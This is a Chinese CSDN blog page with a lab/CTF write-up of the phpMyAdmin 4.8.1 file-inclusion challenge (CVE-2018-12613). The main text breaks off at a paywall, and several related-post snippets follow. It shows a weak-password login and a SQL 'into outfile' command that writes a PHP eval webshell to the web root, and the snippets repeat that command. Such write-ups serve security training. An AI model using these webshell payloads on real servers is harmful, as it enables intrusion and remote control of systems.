墨者学院_phpMyAdmin后台文件包含分析溯源

最新推荐文章于 2024-05-19 18:10:52 发布
最新推荐文章于 2024-05-19 18:10:52 发布
阅读量2.5k 收藏 2
点赞数
文章标签: 墨者学院 phpMyAdmin 分析溯源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc_de_csdn/article/details/100017256
版权
本文介绍了phpMyAdmin 4.8.1版本中的一个远程文件包含漏洞(CVE-2018-12613),详细解析了利用过程。内容包括如何通过弱口令登录,使用SQL注入创建恶意PHP文件,并通过菜刀进行远程控制。此外,还展示了如何利用该漏洞执行PHP代码,如显示系统信息。
摘要由CSDN通过智能技术生成

墨者学院_phpMyAdmin后台文件包含分析溯源

在这里插入图片描述
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,
通过二次编码即可绕过检查,造成远程文件包含漏洞。
受影响版本:
phpMyAdmin 4.8.0和4.8.1受到影响
前台可以使用弱口令直接登录

1.打开靶场,看见登录窗口,使用弱口令登录(root,root)
在这里插入图片描述
2.在mysql下使用:select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php”
这里的hack是菜刀连接时候需要的口令
菜刀使用的链接是:http://219.153.49.228:48959/3.php
包含session文件。本次使用/tmp/sess_sessionid
在数据库窗口写入:
select “<?php eval($_POST[hack]);?>” into outfile “/var/www/html/3.php” --> 这句是可以和菜刀连接的
select “<?php phpinfo();?>” into outfile “/var/www/html/3.p

最低0.47元/天 解锁文章
cc_de_csdn
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1298
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院(POST注入)
2301_77578012的博客
05-19 431
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院——phpMyAdmin后台文件包含分析溯源
知足且坚定,温柔且上进
02-09 520
此题利用一句话木马 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话木马(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php" 此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路
weixin_43071873的博客
08-27 434
进入后台,使用弱口令尝试登入 如admin~admin,root-root等 本题为root-root 点到SQL,发现可以进行sql语句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.执行成功 4.上菜刀 5.在根目录可以找到本题所需要的key 在www/html目录中可以找到写入的一句话木马 ...
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1414
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者安全专家3.2
06-20
安全相关。请下载后自己查毒。
suyuan:溯源后台
03-04
English ||| 介绍 是用于管理界面的可用于生产环境的前端解决方案。 它基于并使用UI Toolkit 。 基于最新的vue开发堆栈,并且具有内置的i18n解决方案,企业应用程序的典型模板以及许多出色的功能。 它可以帮助您构建大型而复杂的单页应用程序。 我相信无论您有什么需求,该项目都将为您提供帮助。 国内用户可访问该地址在线预览 基本模板建议使用: 桌面: 打字稿: typescript (来源: ) 在v4.1.0+版本之后,默认的master分支将不支持i18n。 请使用,它将跟上主更新 当前版本是在vue-cli上构建的v4.0+ 。 如果发现问题,请输入。 如果要使用旧版本,可以将分支切换到 ,它不依赖于vue-cli 该项目不支持低版本的浏览器(例如IE)。 请自行添加polyfill。 准备 您需要在本地安装和 。 该项目基于 , , , ,
墨者学院 - PHP本地包含漏洞代码溯源
多崎巡礼的博客
09-25 719
  根据r.php源码构造本地文件读取url:/r.php?p=../../../../../../../the_key_is_here done
墨者学院PHP本地包含漏洞代码溯源
liangzi321321的博客
09-03 467
打开靶场显示的是一个看似普通的网页,查看网页源码,发现有一些注释 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; ...
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 487
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者】靶场练习——phpMyAdmin后台文件包含分析溯源
weixin_63082823的博客
12-12 551
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
vulhub-phpmyadmin
bqnagus
10-02 351
vulhub-phpmyadmin复现
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1319
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
phpmyadmin 远程文件包含漏洞(CVE-2018-12613)
a1b2c3是弱口令
12-13 1496
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 漏洞记录 漏洞编号:CVE-2018-12613 受影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。 利用条件: 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServ...
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
12-15
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值